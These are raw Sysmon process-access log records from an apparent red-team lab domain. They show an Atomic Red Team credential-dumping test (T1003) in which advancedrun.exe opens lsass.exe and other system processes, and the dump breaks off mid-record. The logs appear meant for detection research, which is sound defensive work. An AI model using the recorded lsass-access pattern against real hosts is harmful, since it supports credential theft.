17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1400-000000002702}352C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942557Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1300-000000002702}832C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\LOCAL SERVICE 10341000x80000000000000003942556Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1200-000000002702}820C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-1 10341000x80000000000000003942555Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942553Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942552Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942550Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003942549Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942547Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942546Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942544Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0900-000000002702}576C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942543Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0800-000000002702}500C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942541Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0700-000000002702}492C:\Windows\system32\wininit.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942540Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0500-000000002702}420C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942539Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-0200-000000002702}320C:\Windows\System32\smss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942534Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-EB14-61EA-2103-000000002702}55765644C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe{834264DD-DAE2-61EA-EB03-000000000000}4System0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003942526Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:19:16.968{834264DD-DAE4-61EA-0C00-000000002702}652104C:\Windows\system32\lsass.exe{834264DD-EB14-61EA-2103-000000002702}5576C:\AtomicRedTeam\atomics\T1003\bin\AdvancedRun\advancedrun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32